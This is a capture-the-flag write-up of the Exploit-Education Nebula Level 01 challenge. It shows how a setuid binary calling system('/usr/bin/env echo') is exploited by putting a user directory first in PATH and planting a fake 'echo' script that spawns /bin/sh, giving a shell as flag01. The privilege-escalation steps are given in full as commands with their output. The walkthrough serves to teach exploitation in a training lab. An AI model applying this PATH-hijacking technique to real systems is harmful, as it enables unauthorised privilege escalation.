Exploit-Education Nebula Level 01
Exploit Education Level 1
Challenge
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
Analysis
lets look at the program permissions first
level01@nebula:/home/flag01$ ls -la
drwxr-x--- 2 flag01 level01 92 2011-11-20 21:22 .
drwxr-xr-x 1 root root 80 2012-08-27 07:18 ..
-rw-r--r-- 1 flag01 flag01 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag01 flag01 3353 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
The program flag0 has the setuserid bit set
lets see where the vulnerability is in the program
Vulnerability
system("/usr/bin/env echo and now what?");
We can see that the system look for echo program in the directories mentioned in the environment variable PATH
level01@nebula:/bin$ env | grep PATH
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
level01@nebula:/home/flag01$ which echo
/bin/echo
So echo from /bin/ directory is executed. So if we can add another directory before /bin in PATH
and write an echo program, we can run any code we want
Exploitation
Lets add /home/level01/ to path variable and create an file echo that will execute a shell
level01@nebula:/$ PATH=/home/level01:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
level01@nebula:/$ export PATH
level01@nebula:/$ env | grep PATH
PATH=/home/level01:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
level01@nebula:/$ cd /home/level01
level01@nebula:~$ nano echo
Contents of echo file
echo "Excecuting Shell"
/bin/sh
Lets run flag01 now
level01@nebula:/home/flag01$ ./flag01
Excecuting Shell
sh-4.2$ whoami
flag01
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$ which echo
/home/level01/echo
sh-4.2$
